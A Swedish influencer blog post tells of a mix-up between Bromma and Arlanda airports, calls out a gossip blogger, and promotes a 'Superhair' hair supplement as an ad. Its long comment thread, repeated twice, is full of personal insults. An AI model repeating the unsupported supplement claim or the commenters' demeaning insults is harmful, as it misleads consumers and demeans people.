Framme i Köpenhamn! Med Mr tidsoptimist!

Inlägget innehåller reklamlänk

3193D8BE-36C4-47D3-8D95-F927D027443F

Framme i Köpenhamn! ✈️😎

Jösses vilken morgon😅🙈

Vaknade hemma hos Bobby. frukost, kaffe och lugn och ro….  Gott om tid, (tycket han). Vi hoppade in i en uber, (lite för sent enligt mig…. ) Men ändå ”i tid”, men med NOLL mariginalen för strul….  (enligt mig)

Bobby säger Arlanda till chauffören 🚖 Ingen reagerar.

Framme på Arlanda inser vi, att vi skulle flugit FRÅN Bromma, och landat på Arlanda🤦🏼‍♀️ Hinner inte åka till Bromma, 30 min till avgång. -Panik!

 

Måste köpa nya biljetter från Arlanda. För sent att köpa till nästa flight till Malmö. Efter många om och men så får vi istället köpa till Köpenhamn 🙈 Dubbla priset såklart! 🤦🏼‍♀️

 

Alltså hela denna resans pris hade kunnat ge oss en vecka all-inclusive på varmare breddgrader 🌴, men Bobby som alltid ser det positiva i ALLT säger

”Men My, nu har vi iallafall varit utomlands tillsammans” 🤣!

 

Härifrån ska vi nu ta oss tillbaka till Sverige, och vidare till Lund 🤣  Detta var den ”korta versionen”.

Att Bobbys BÅDA mobiler är helt urladdar, att laddarna inte har adapter och allt annat som hänt under morgonens gång….. Det struntar vi i! 😎

 

En sak kan jag iallafall garantera. Man har ALDRIG tråkigt med Bobby. Mina magmuskler har redan kramp av alla skratt!🤣 och då har dagen bara börjat!  ( Ako, din magträning får konkursens  av en morgon med Bobby 🤣)

 

Även om Bobby (ALLTID ‼️)  är Mr Tidsoptimist…… Så kan man inte annat än att älska denna människan ❣️👇🏻

57DC0AF4-92A2-415A-8FC7-4BF903D7F975

2019 är Bobbys år. Mycket spännande på G, som ni kommer få ta del av löpande under årets gång 😍 -Jag är så otroligt stolt och glad för hans skull!

❤️😭 Nu vill jag även passa på att göra en reminder om Superhair kampanjen som pågår just nu.

Detta kampanjpris gäller endast nu och fram till alla-hjärtans-dag ❤️ Prismässigt är det bästa vi gjort hittills 😍 det blir nästan 40%, just för att visa våran tacksamhet till alla er som är befintliga kunder. Samt för att ge alla er som inte testat ännu, en chans att göra det till ett riktigt ”prova på pris” 😊

Om du redan äter Superhair är det ett perfekt tillfälle att bunkra upp….. Om du inte testat att äta Superhair ännu, så är det dags att göra det nu! Min rekommendation är att du passar på att beställa två paket på en gång, då priset är så bra ☺️

05E9F135-EE30-413C-8F8F-EB39B662D56C

 

-bättre hårnäring finns inte! 🌟👌🏻 In och BESTÄLL HÄR! 👈🏻

🤣🤣🤣🤣👇🏻

7AA1D9B6-5612-4211-8839-949EE9939953

PS! Vem sover egentligen bäst? Vad det gäller sista dagarnas inlägg från Bloggbevakningen så finner jag inga ord!

Hon gjorde sig ”rolig” över Bobby & Jimis fotovägg, där dom har bilder på sig själva och Samuel …. (Som syndes i bakgrunden på en bild av mig) Dessa tapeter fick Bobby som present av sin avlidne sambo Samuel, när han fortfarande levde. Han har valt att behålla dessa….. och lagt till sin älskade Jimi. Fint…. om du frågar mig ❤️ Det finns saker man gör, sen finns det saker man inte gör.

Detta är ett praktexempel på ännu ett av ”CAM CAMs” vidriga övertramp… 🤢

-Måste man verkligen bygga upp sin ”karriär” genom att var elak mot andra?

Fattar inte hur man kan vara så utstuderat elak 😓🤦🏼‍♀️

Hur korkade, dumma och fruktansvärda hon än försöker framställa oss och MÅNGA andra!

Så är Bobby ett praktexempel på en person med GOTT hjärta, GODA avsikter och en människan som alltid försöker lyfta andra ❤️👊🏻 -Undra vem som sover bäst om nätterna, CAM CAM eller Bobby? 🤔 /My Martens

113 Komentarer

  1. Alltså My, sopa rent framför din egen dörr innan du ger sig på andra bloggare.
    Och trippen.. ser faktiskt inget roligt i det ? Vuxen männska som inte kan planera.
    Och du som säger att din ekonomi är kass..

    • Det kan hände den bästa…. Alla kan göra fel ibland ?? nu åkte vi till Arlanda, fastän vi skulle till Bromma. Hoppsan! Mänskliga faktorn slog till….. och du… min ekonomi var kass, jag har jobbat arslet av mig för att komma upp på fötterna efter konkursen 2016. Men nu har åren hunnit gå, såren börjat läka, och ekeonomin likaså…. -Tack för omtanken ?

  2. Menar du My att ni flyger till Köpenhamn för att ta er till Lund? I sånt fall är du inte riktigt klok. Fast det visste jag redan.

    • Du verkar inte heller så klok, inte ens klara av att googla avstånd för att inte verka korkad själv innan man gör ett inlägg där man vill förminska någon.
      Köpenhamn – Lund 58 km, c:a
      Skurup – Lund 56 km, c:a
      Bron är 100 ggr vackrare väg än vägen mellan Skurup och Lund.
      Köpenhamn är alltid värt ett besök! ❤️

      • Till Moa
        Nu heter ju för det första flygplatsen i Malmö STURUP och inte Skurup och det är mycket närmare och billigare därifrån till Lund än från Köpenhamn, sen var det ju det där med klok ?

        • Haha… Oj då… Då skjuter jag mig väl då! ?
          Men varför bryr du dig om vad de väljer att betala?
          Det kan ju vara så att flyg till Sturup/Skurup inte funkade tidsmässigt. Vad vet vi? *gäsp*.
          Nä, du verkar inte klokare med det här inlägget. Tvärt om, diagnos: Svårt att hålla fokus.⛑

          • Bryr mig inte ett dugg om vad det kostar och det var inte heller det viktigaste här utan att du säger andra inte är så kloka. Sen skrev ju My varför de inte inte flög till Malmö som planerat så läs nogrannare innan du kommenterar alla härinne.

          • Hahaha..,, Mollan…
            Du är lila korkad som vanligt!
            Aningslös skrev att My inte var riktigt klok. Men som vanligt flög allt över ditt lilla huvud.
            Diskussionerna med dig är tröstlösa pga din oförmåga att sortera ens en tanke i huvudet.
            Du hänger inte med utan styrs av känslor som är helt orimliga.

          • Så tycker jag du ska lägga ner diskussionen Moa svårare än så är det inte, du har redan svarat snart alla härinne, 8 kommentarer bara på det här inlägget.
            (Skurup – Sturup 17,6 km ?)

          • Samma misstag om igen, Mollan.
            Här liksom där försöker du styra vem ska svara vem och när. Du skriver massa bittra avundsjuka kommentarer i nästan varje inlägg My gör. My mfl ber dig lägga ner. Hur respekterar du det tycker du? Betydligt fler än jag någonsin har skrivit hos My. Inlägg efter inlägg, dag efter dag, vecka efter vecka och så vidare.
            Vem är du att ens kommentera mina inlägg till antal?
            Ojojoj… Du fattar att man kan googla. Bra där men vem bryr sig om det avståndet? Tycker du inte själv att du verkar stendum med ditt tjatande?
            Men iofs vem är jag att tro dig om någon intelligens!

          • Det jag kommenterade var din överlägsna bessewisser information Moa, att det minsann var längre till Skurup från Malmö än från Cph när flygplatsen faktiskt heter Sturup, inget annat men det har du så klart glömt och hittar på en massa annat skit istället för att få fortsätta du måste älska att se och höra dig själv. Jag brukar inte kommentera andras kommentarer som du utan inlägget så låt folk tycka och tänka vad de vill det har du absolut inte med att göra. Nu lämnar jag dig till dig själv ingen ide att prata med en vägg.

          • Ha ha haaa Moa!!! Mitt i prick!! ? ” Oj då,,,då skjuter jag väl mig då” var absolut veckans bästa svar på bjäffsiga kommentarerna!! ?
            Stöder dig till 100% !!!

        • Bjäffsig kommentar? ren fakta bara att Malmös flygplats heter Sturup och inte Skurup hur lätt som helst att googla ?. Fakta står inte ens denna Moa över.

  3. Tror nog både du och bobby sover BÄST!
    Jiises vilken tripp fattas väl bara att dessa, anonyma aningslösa och kommer med en massa skit nu…
    ( bara får jag skriver det kommer det rassla in)
    Men tur man kan skratta åt allt, ni är en bra duo ? och kapslarna är dunderbra ?
    Å du ; Anonym 12 februari, 2019 on 13:41 kryp tillbaka under din sten, vissa saker håller man inom sig när det ändå, inte är nått snällt man vill säga, vem är du att döma??
    Tveksam om du faktisk skulle säga det öga mot öga! Varför skriver, du annars anonymt?
    nä fega er vad ni anonyma är. Hej på er!

  4. Nåt helt annat…nu är texten ömsom stor ömsom pytte pytte liten igen när man läser ditt senaste inlägg via mobilen. Det är sjukt svårt att läsa. Så snälla tänk på att ha samma textstorlek eller samma typ av typsnitt. Så blir det lättare att läsa. Tack på förhand.

  5. Alltså My, sopa rent framför din egen dörr innan du ger sig på andra bloggare.

    Och trippen.. ser faktiskt inget roligt i det 🙄 Vuxen männska som inte kan planera.
    Och du som säger att din ekonomi är kass..

    • Det kan hände den bästa…. Alla kan göra fel ibland 🤣🙈 nu åkte vi till Arlanda, fastän vi skulle till Bromma. Hoppsan! Mänskliga faktorn slog till….. och du… min ekonomi var kass, jag har jobbat arslet av mig för att komma upp på fötterna efter konkursen 2016. Men nu har åren hunnit gå, såren börjat läka, och ekeonomin likaså…. -Tack för omtanken 😉

  6. Bry dig inte om den där Camilla och all skit hon spyr ut sig på bloggen. Man måste verkligen må skit om man sitter och letar fel på andra hela dagarna som hon gör. Att hon snöat in sig på Isabella Löwrengrip känns obehagligt på något sätt.
    VAD är det för hat som driver henne till detta kan man fråga sig..
    så uppenbart att hon inte mår bra och förhoppningsvis läggs bloggen ner eller tappar besökare inom en snar framtid.
    Synd att inte Trolljägarna letar reda på henne och ställer henne emot väggen så att hon fattar hur patetiskt hon beter sig..
    Sen vill jag bara skicka en stor kram till dig och framför allt till Bobby. Han verkar vara så himla fantastisk och förtjänar inte att bli hånad så som han blev i den där töntiga skvallerbloggen.
    Ta ingen skit, ignorera henne, låt bli att interagera eller gr svar på tal. Låt dig inte provoceras av henne.
    Bara var dig sjäv och fortsätt sprida positiva vibbar så som du gör här på din blogg!
    Megakram!❤️

    • Lyssnar man på de poddar Camilla är med i så får man verkligen inblick i att något är feeel, fel, fel.
      Ibland tycker jag nästan synd om henne. Så omedveten som hon tycks om sig själv.
      Tror egentligen inte hon vill vara elak/korkad utan rolig. Men tyvärr hon har ingen humor och noll tajming.

      • Håller med, lyssnat på två saker hon varit med i och det är så uppenbart att hon hör det hon vill höra och vänder på saker till sin fördel.
        Hon tar inte in vad folk säger eller frågar henne utan babblar bara på som en stolle.
        Hon är fullständigt inkapabel till att ta emot kritik som en vuxen människa och det visar hon tydligt i sina svar genom stt förminska, flamsa bort eller spela dum när hon svarar folk.
        Och alla som ifrågasätter eller säger emot henne blockar hon så hela hennes blogg är nästintill fylld med ja- sägare som är lika bittra som hon själv.
        Jag fattar verkligen inte grejen med att sprids så mycket bitterhet och avsky på det sättet hon gör.
        Någon borde koppla ur hennes wi-fi omgående.

        • Hahaha..,, Mollan…
          Du är lila korkad som vanligt!
          Aningslös skrev att My inte var riktigt klok. Men som vanligt flög allt över ditt lilla huvud.
          Diskussionerna med dig är tröstlösa pga din oförmåga att sortera ens en tanke i huvudet.
          Du hänger inte med utan styrs av känslor som är helt orimliga.

        • Nej, jag pratar om Camilla.
          Jämfört med henne sitter inte My och klankar ner på andra för att känna sig tillfreds med livet.
          Som du själv nämner, man kan inte hålla med om allt här i livet och jag håller sannerligen inte med en människa vars enda syfte verkar vara att håna och smutskasta andra 24/7.
          Håller du inte med mig kommer det inte störa mig märkbart.

  7. Menar du My att ni flyger till Köpenhamn för att ta er till Lund? I sånt fall är du inte riktigt klok. Fast det visste jag redan.

    • Du verkar inte heller så klok, inte ens klara av att googla avstånd för att inte verka korkad själv innan man gör ett inlägg där man vill förminska någon.

      Köpenhamn – Lund 58 km, c:a
      Skurup – Lund 56 km, c:a

      Bron är 100 ggr vackrare väg än vägen mellan Skurup och Lund.

      Köpenhamn är alltid värt ett besök! ❤️

      • Till Moa
        Nu heter ju för det första flygplatsen i Malmö STURUP och inte Skurup och det är mycket närmare och billigare därifrån till Lund än från Köpenhamn, sen var det ju det där med klok 😮

        • Haha… Oj då… Då skjuter jag mig väl då! 🔫

          Men varför bryr du dig om vad de väljer att betala?

          Det kan ju vara så att flyg till Sturup/Skurup inte funkade tidsmässigt. Vad vet vi? *gäsp*.

          Nä, du verkar inte klokare med det här inlägget. Tvärt om, diagnos: Svårt att hålla fokus.⛑

          • Bryr mig inte ett dugg om vad det kostar och det var inte heller det viktigaste här utan att du säger andra inte är så kloka. Sen skrev ju My varför de inte inte flög till Malmö som planerat så läs nogrannare innan du kommenterar alla härinne.

          • Hahaha..,, Mollan…

            Du är lila korkad som vanligt!

            Aningslös skrev att My inte var riktigt klok. Men som vanligt flög allt över ditt lilla huvud.

            Diskussionerna med dig är tröstlösa pga din oförmåga att sortera ens en tanke i huvudet.

            Du hänger inte med utan styrs av känslor som är helt orimliga.

          • Så tycker jag du ska lägga ner diskussionen Moa svårare än så är det inte, du har redan svarat snart alla härinne, 8 kommentarer bara på det här inlägget.
            (Skurup – Sturup 17,6 km 😉)

          • Samma misstag om igen, Mollan.

            Här liksom där försöker du styra vem ska svara vem och när. Du skriver massa bittra avundsjuka kommentarer i nästan varje inlägg My gör. My mfl ber dig lägga ner. Hur respekterar du det tycker du? Betydligt fler än jag någonsin har skrivit hos My. Inlägg efter inlägg, dag efter dag, vecka efter vecka och så vidare.

            Vem är du att ens kommentera mina inlägg till antal?

            Ojojoj… Du fattar att man kan googla. Bra där men vem bryr sig om det avståndet? Tycker du inte själv att du verkar stendum med ditt tjatande?

            Men iofs vem är jag att tro dig om någon intelligens!

          • Det jag kommenterade var din överlägsna bessewisser information Moa, att det minsann var längre till Skurup från Malmö än från Cph när flygplatsen faktiskt heter Sturup, inget annat men det har du så klart glömt och hittar på en massa annat skit istället för att få fortsätta du måste älska att se och höra dig själv. Jag brukar inte kommentera andras kommentarer som du utan inlägget så låt folk tycka och tänka vad de vill det har du absolut inte med att göra. Nu lämnar jag dig till dig själv ingen ide att prata med en vägg.

          • Ha ha haaa Moa!!! Mitt i prick!! 🙂 ” Oj då,,,då skjuter jag väl mig då” var absolut veckans bästa svar på bjäffsiga kommentarerna!! 🙂
            Stöder dig till 100% !!!

        • Bjäffsig kommentar? ren fakta bara att Malmös flygplats heter Sturup och inte Skurup hur lätt som helst att googla 👍. Fakta står inte ens denna Moa över.

  8. Tror nog både du och bobby sover BÄST!
    Jiises vilken tripp fattas väl bara att dessa, anonyma aningslösa och kommer med en massa skit nu…
    ( bara får jag skriver det kommer det rassla in)

    Men tur man kan skratta åt allt, ni är en bra duo 😉 och kapslarna är dunderbra 😉

    Å du ; Anonym 12 februari, 2019 on 13:41 kryp tillbaka under din sten, vissa saker håller man inom sig när det ändå, inte är nått snällt man vill säga, vem är du att döma??
    Tveksam om du faktisk skulle säga det öga mot öga! Varför skriver, du annars anonymt?
    nä fega er vad ni anonyma är. Hej på er!

  9. Nåt helt annat…nu är texten ömsom stor ömsom pytte pytte liten igen när man läser ditt senaste inlägg via mobilen. Det är sjukt svårt att läsa. Så snälla tänk på att ha samma textstorlek eller samma typ av typsnitt. Så blir det lättare att läsa. Tack på förhand.

  10. Vet inte varför du vill göra karriär genom att ljuga och manipulera men förstår av ditt inlägg att det kan vara din enda chans att få jobb. Så generellt nej, i ditt fall ja!
    Innan du börjar ditt nya jobb så ska du få ett ovärderligt gratistips av mig: Säg alltid vad du tycker, men lär dig att inte säga allt du tycker. Vem bryr sig egentligen? Du är ju bara en nolla!
    Du hedrar dina kära som du vill och Bobby som han vill. Varför tror du ditt sätt är fint och bra?
    Finns massor av sätt som inte är ditt sätt. Finns bara ett rätt, det är att alla gör som dom själva vill!

    • Haha! Jodå, det har vi också fått hörs😅 men på instgram…. vi försöker dock välja tåg, framför flyg… men ibland funkar inte det ☺️

  11. Bry dig inte om den där Camilla och all skit hon spyr ut sig på bloggen. Man måste verkligen må skit om man sitter och letar fel på andra hela dagarna som hon gör. Att hon snöat in sig på Isabella Löwrengrip känns obehagligt på något sätt.
    VAD är det för hat som driver henne till detta kan man fråga sig..
    så uppenbart att hon inte mår bra och förhoppningsvis läggs bloggen ner eller tappar besökare inom en snar framtid.
    Synd att inte Trolljägarna letar reda på henne och ställer henne emot väggen så att hon fattar hur patetiskt hon beter sig..

    Sen vill jag bara skicka en stor kram till dig och framför allt till Bobby. Han verkar vara så himla fantastisk och förtjänar inte att bli hånad så som han blev i den där töntiga skvallerbloggen.

    Ta ingen skit, ignorera henne, låt bli att interagera eller gr svar på tal. Låt dig inte provoceras av henne.
    Bara var dig sjäv och fortsätt sprida positiva vibbar så som du gör här på din blogg!

    Megakram!❤️

    • Lyssnar man på de poddar Camilla är med i så får man verkligen inblick i att något är feeel, fel, fel.

      Ibland tycker jag nästan synd om henne. Så omedveten som hon tycks om sig själv.

      Tror egentligen inte hon vill vara elak/korkad utan rolig. Men tyvärr hon har ingen humor och noll tajming.

      • Håller med, lyssnat på två saker hon varit med i och det är så uppenbart att hon hör det hon vill höra och vänder på saker till sin fördel.
        Hon tar inte in vad folk säger eller frågar henne utan babblar bara på som en stolle.
        Hon är fullständigt inkapabel till att ta emot kritik som en vuxen människa och det visar hon tydligt i sina svar genom stt förminska, flamsa bort eller spela dum när hon svarar folk.
        Och alla som ifrågasätter eller säger emot henne blockar hon så hela hennes blogg är nästintill fylld med ja- sägare som är lika bittra som hon själv.

        Jag fattar verkligen inte grejen med att sprids så mycket bitterhet och avsky på det sättet hon gör.

        Någon borde koppla ur hennes wi-fi omgående.

        • Hahaha..,, Mollan…

          Du är lila korkad som vanligt!

          Aningslös skrev att My inte var riktigt klok. Men som vanligt flög allt över ditt lilla huvud.

          Diskussionerna med dig är tröstlösa pga din oförmåga att sortera ens en tanke i huvudet.

          Du hänger inte med utan styrs av känslor som är helt orimliga.

        • Nej, jag pratar om Camilla.

          Jämfört med henne sitter inte My och klankar ner på andra för att känna sig tillfreds med livet.

          Som du själv nämner, man kan inte hålla med om allt här i livet och jag håller sannerligen inte med en människa vars enda syfte verkar vara att håna och smutskasta andra 24/7.

          Håller du inte med mig kommer det inte störa mig märkbart.

  12. Vet inte varför du vill göra karriär genom att ljuga och manipulera men förstår av ditt inlägg att det kan vara din enda chans att få jobb. Så generellt nej, i ditt fall ja!

    Innan du börjar ditt nya jobb så ska du få ett ovärderligt gratistips av mig: Säg alltid vad du tycker, men lär dig att inte säga allt du tycker. Vem bryr sig egentligen? Du är ju bara en nolla!

    Du hedrar dina kära som du vill och Bobby som han vill. Varför tror du ditt sätt är fint och bra?
    Finns massor av sätt som inte är ditt sätt. Finns bara ett rätt, det är att alla gör som dom själva vill!

  13. My, sluta ta på dig offerkortan så fort du blir kritiserad. Sluta försök skifta fokus från det faktum att du olagligt satt med mobilen i handen för att ta en bild när du körde i en höööög hastighet. Ser så löjligt ut när du ska kasta skit på CamCam och själv vara såååå oskyldig. Sen hänger du med B-kändisar och tror det är skithäftigt?! Nej tack

    • Det finns ingen offerkofta här ? hög hastighet? 110 på 110 väg? Fråga är bara… vem höll i mobilen ?
      Vet du… mycket skit och påhopp kan jag ta. Men när man tack vare CAM CAMs elaka inlägg gällande deras inredning drar igång en diskussion gällande bobbys avliden sambo, få tycker jag att det gått för långt. Ingenting jat ställer mig bakom.
      Bobby har varit offentlig frisör i 27 år. Tv produktion efter tv produktion…. huruvida du vill sätta någon rangordning på Någon som du lärt känna via media känns ju lite meningslöst minst sagt ? ?

      • Vi vet alla, inklusive du själv, att du höll i mobilen. Vem försöker du lura? IQ:n må va låg på dina trogna följare men en normalbegåvad person ser det utan tvekan. Kolla bara all kritik du fått och hur du låtsas förneka det ?
        Har inte sagt något om inredning, det kunde jag inte bry mig mindre om. Tvärtom tycker jag det är fint! Det jag inte tycker om är att veta att jag möter personer som dig på vägarna som riskerar mitt och mina barns liv. Det gör mig riktigt förbannad

        • Jag har redan bemött det, tydligt. Sen att du väljer att inte accepterar mitt svar är ju helt upp till dig, och är du arg för att du känner att jag riskerar ditt och dina barns liv, det får ärligt talat stå för dig ????‍♀️ Men jag är såklart väldigt ledsen att du känner så……

      • Men kära anonym….. klassikt. Hon sätter fart på rykten, påståenden, och eldar upp sitt egna kommentarsfält för att ”gömma sig” bakom läsarn som då slutför jobbet hon påbörjat….. sen är det ju väldigt uppenbart att hon själv är en av många som skriver anonymt….. Jösses vilken låg nivå ??‍♀️

        • Bortförklaring efter bortförklaring. Du är som ett barn som blivit påkommen med handen i kakburken och kaksmulor runt hela munnen men skyller på hunden

      • Om du nu bemött saken o förklarat varför blev då bilden redigerad??
        Håller med Olivia! Kakburken är såååå beskrivande ??
        My ska inte prata om ärlig,ärlighet,äkta osv osv. Bloggen är raka motsatsen.
        Jaaa jag kan sluta läsa. Men vill se när gropen blir djupare o djupare.
        Du får nog ta o tänka om o börja blogga på riktigt ??

        • Majsan/Olivia vi är ganska många som har gått vidare i livet nu, men ni har fastnat liksom.
          Tyck vad ni vill men sluta tjata här om det nu.

  14. My, sluta ta på dig offerkortan så fort du blir kritiserad. Sluta försök skifta fokus från det faktum att du olagligt satt med mobilen i handen för att ta en bild när du körde i en höööög hastighet. Ser så löjligt ut när du ska kasta skit på CamCam och själv vara såååå oskyldig. Sen hänger du med B-kändisar och tror det är skithäftigt?! Nej tack

    • Det finns ingen offerkofta här 🤣 hög hastighet? 110 på 110 väg? Fråga är bara… vem höll i mobilen 😉

      Vet du… mycket skit och påhopp kan jag ta. Men när man tack vare CAM CAMs elaka inlägg gällande deras inredning drar igång en diskussion gällande bobbys avliden sambo, få tycker jag att det gått för långt. Ingenting jat ställer mig bakom.

      Bobby har varit offentlig frisör i 27 år. Tv produktion efter tv produktion…. huruvida du vill sätta någon rangordning på Någon som du lärt känna via media känns ju lite meningslöst minst sagt 😅 🙈

      • Vi vet alla, inklusive du själv, att du höll i mobilen. Vem försöker du lura? IQ:n må va låg på dina trogna följare men en normalbegåvad person ser det utan tvekan. Kolla bara all kritik du fått och hur du låtsas förneka det 😂
        Har inte sagt något om inredning, det kunde jag inte bry mig mindre om. Tvärtom tycker jag det är fint! Det jag inte tycker om är att veta att jag möter personer som dig på vägarna som riskerar mitt och mina barns liv. Det gör mig riktigt förbannad

        • Jag har redan bemött det, tydligt. Sen att du väljer att inte accepterar mitt svar är ju helt upp till dig, och är du arg för att du känner att jag riskerar ditt och dina barns liv, det får ärligt talat stå för dig 🤣🙈🤦🏼‍♀️ Men jag är såklart väldigt ledsen att du känner så……

      • Men kära anonym….. klassikt. Hon sätter fart på rykten, påståenden, och eldar upp sitt egna kommentarsfält för att ”gömma sig” bakom läsarn som då slutför jobbet hon påbörjat….. sen är det ju väldigt uppenbart att hon själv är en av många som skriver anonymt….. Jösses vilken låg nivå 🤦🏼‍♀️

        • Bortförklaring efter bortförklaring. Du är som ett barn som blivit påkommen med handen i kakburken och kaksmulor runt hela munnen men skyller på hunden

      • Om du nu bemött saken o förklarat varför blev då bilden redigerad??
        Håller med Olivia! Kakburken är såååå beskrivande 👍🏻

        My ska inte prata om ärlig,ärlighet,äkta osv osv. Bloggen är raka motsatsen.

        Jaaa jag kan sluta läsa. Men vill se när gropen blir djupare o djupare.

        Du får nog ta o tänka om o börja blogga på riktigt 💪🏻

        • Majsan/Olivia vi är ganska många som har gått vidare i livet nu, men ni har fastnat liksom.
          Tyck vad ni vill men sluta tjata här om det nu.

  15. Kan ni inte bara tycka att det var kul att de åkte fel (som inlägget handlar om) ?!?
    Och om kaffekoppen så okej, man kan hålls i ratten med ett finger..

  16. Kan ni inte bara tycka att det var kul att de åkte fel (som inlägget handlar om) ?!?
    Och om kaffekoppen så okej, man kan hålls i ratten med ett finger..

  17. Hej nu tycker jag det får vara slut på alla tråkiga kommentarer o påhopp på My.
    Vissa verkar ha det som hobby att hacka på andra. Låt oss glädjas åt vårsolen o vara optimistiska o inte fastna i negativism.
    Livet innehåller så mycket att glädja sig åt, och vi kan förvalta det på bästa sätt?

    • Ja jag håller med dig fullständigt Anncharlotte.
      Fattar inte att dom orkar hålla på som dom gör. En normal människa mår dåligt av att göra så. Usch.
      Kram både till dig och My.
      Från L

  18. Hej nu tycker jag det får vara slut på alla tråkiga kommentarer o påhopp på My.
    Vissa verkar ha det som hobby att hacka på andra. Låt oss glädjas åt vårsolen o vara optimistiska o inte fastna i negativism.
    Livet innehåller så mycket att glädja sig åt, och vi kan förvalta det på bästa sätt😊

    • Ja jag håller med dig fullständigt Anncharlotte.
      Fattar inte att dom orkar hålla på som dom gör. En normal människa mår dåligt av att göra så. Usch.
      Kram både till dig och My.
      Från L

  19. Skit i trollen My, ge dig inte in med försvar efter deras kommentarer, det triggar dom.
    En liten fråga bara, jag vet att du förnekat att du gjort nåt med dina läppar, men på dina bilder senaste tiden ser läpparna bara såå fylliga ut. Somliga bloggarer skulle ge vad som helst d dina läppar ( dock inte jag, men så är jag ingen bloggare heller)
    Vårkram från ett soligt Skåne

  20. Skit i trollen My, ge dig inte in med försvar efter deras kommentarer, det triggar dom.
    En liten fråga bara, jag vet att du förnekat att du gjort nåt med dina läppar, men på dina bilder senaste tiden ser läpparna bara såå fylliga ut. Somliga bloggarer skulle ge vad som helst d dina läppar ( dock inte jag, men så är jag ingen bloggare heller)

    Vårkram från ett soligt Skåne

  21. Blir ju helt chockad närmande läser hör och sen tittar på kommentarerna hos bloggbevakning! ?
    Är det en sida för pubertetsstinna tonåringar, för inte sjutton kan det vara vuxna människor som skriver?!
    Så nedvärderande kommentarer om både My och Bobby och Bobbys fototapet som består av hans avlidna man bl.a! Äckligt att ge sig på en sorg och äckligt att vuxna människor sprider sånt hat! Nu förstår man varför världen ser ut som den gör. ?
    Hoppas verkligen att de som sitter och trycker ner andra bakom sitt tangentbord inte har barn!
    Usch och tvi!

  22. Blir ju helt chockad närmande läser hör och sen tittar på kommentarerna hos bloggbevakning! 😱
    Är det en sida för pubertetsstinna tonåringar, för inte sjutton kan det vara vuxna människor som skriver?!

    Så nedvärderande kommentarer om både My och Bobby och Bobbys fototapet som består av hans avlidna man bl.a! Äckligt att ge sig på en sorg och äckligt att vuxna människor sprider sånt hat! Nu förstår man varför världen ser ut som den gör. 😡

    Hoppas verkligen att de som sitter och trycker ner andra bakom sitt tangentbord inte har barn!
    Usch och tvi!

  23. Jisses My vilken storm det är härinne. Men försök att inte bry dig om dessa ”fantastiska” vetare….
    Kram o ha en fin alla hjärtans dag önskar jag dig o Jonas

  24. Jisses My vilken storm det är härinne. Men försök att inte bry dig om dessa ”fantastiska” vetare….
    Kram o ha en fin alla hjärtans dag önskar jag dig o Jonas

  25. SLUTA NU!!!!!!!!!!!!!!!!!!!!!!!!!!!!! Jag får fasiken panik. Vad är det för fel på er som måste klanka ner på än den ena, än den andra. SNÄLLA! Vi har alla fått ett enda futtigt LIV. ETT ENDA LIV. Som kan ta slut när som helst.
    Kan vi inte göra nått bra av det istället för att sitta inne hos bloggare och kasta dynga. Det måste finnas bättre saker att diskutera. Må hända att vissa av er har rätt i sak men för den skull, TONEN ni för är, jag finner inga ord, under all kritik. Inget av mina barn har någonsin sagt eller gjort något så elakt någonsin som vissa av er här inne håller på med.
    LYSSNA NOGA NU. Hur många av er vill vara med och vara delaktiga i barns självmord? Begrunda denna fråga flera ggr innan ni svarar. Det sitter barn och läser saker överallt på internet och läser dom vad ni skriver så anser dom att det är rätt. Det i sin tur innebär att det är helt ok att vara elak och dum, mobba och förstöra andras liv. Jag vet flera barn som tagit sitt liv, som hängt sig, som kastat sig framför tåg, som tagit föräldrars sömntabletter och dom var allt från 11 år upp till 16. Snälla, jag ber er. Tänk om det vore era barn. Världen har man snart gett upp, den är sjuk men kan vi vuxna försöka ha en trevlig ton gentemot varandra, att vi börjar så kanske vi kan göra nått gott.
    Kan vi inte föra en diskussion på normal nivå vad den en handlar om. Vi tycker olika och låt oss vara överens att vi tycker olika och att det vi alla tycker kan vara en eget rätta. Mitt rätta behöver inte vara någon annans rätta men det kan man säga med artighet.
    Man brukar säga att det var bättre förr och det ligger mycket i det. I alla fall vad gäller hur vi är gentemot varandra. Varför skriver jag ens?

  26. SLUTA NU!!!!!!!!!!!!!!!!!!!!!!!!!!!!! Jag får fasiken panik. Vad är det för fel på er som måste klanka ner på än den ena, än den andra. SNÄLLA! Vi har alla fått ett enda futtigt LIV. ETT ENDA LIV. Som kan ta slut när som helst.

    Kan vi inte göra nått bra av det istället för att sitta inne hos bloggare och kasta dynga. Det måste finnas bättre saker att diskutera. Må hända att vissa av er har rätt i sak men för den skull, TONEN ni för är, jag finner inga ord, under all kritik. Inget av mina barn har någonsin sagt eller gjort något så elakt någonsin som vissa av er här inne håller på med.

    LYSSNA NOGA NU. Hur många av er vill vara med och vara delaktiga i barns självmord? Begrunda denna fråga flera ggr innan ni svarar. Det sitter barn och läser saker överallt på internet och läser dom vad ni skriver så anser dom att det är rätt. Det i sin tur innebär att det är helt ok att vara elak och dum, mobba och förstöra andras liv. Jag vet flera barn som tagit sitt liv, som hängt sig, som kastat sig framför tåg, som tagit föräldrars sömntabletter och dom var allt från 11 år upp till 16. Snälla, jag ber er. Tänk om det vore era barn. Världen har man snart gett upp, den är sjuk men kan vi vuxna försöka ha en trevlig ton gentemot varandra, att vi börjar så kanske vi kan göra nått gott.

    Kan vi inte föra en diskussion på normal nivå vad den en handlar om. Vi tycker olika och låt oss vara överens att vi tycker olika och att det vi alla tycker kan vara en eget rätta. Mitt rätta behöver inte vara någon annans rätta men det kan man säga med artighet.

    Man brukar säga att det var bättre förr och det ligger mycket i det. I alla fall vad gäller hur vi är gentemot varandra. Varför skriver jag ens?

Svara

Lämna din kommentar!
Ditt namn här

Om du missat..

Andas ut stressen med hjälp av djupandning

Andas ut stressen med hjälp av djupandning -Hur många tänker egentligen på sin andning? Jag...

SMEG bagaren och kocken 20%

I reklamsamarbete Bagaren och Kocken ??‍? Hej på er! Detta är en grymt efterlängtad kampanj...

Adviral Event

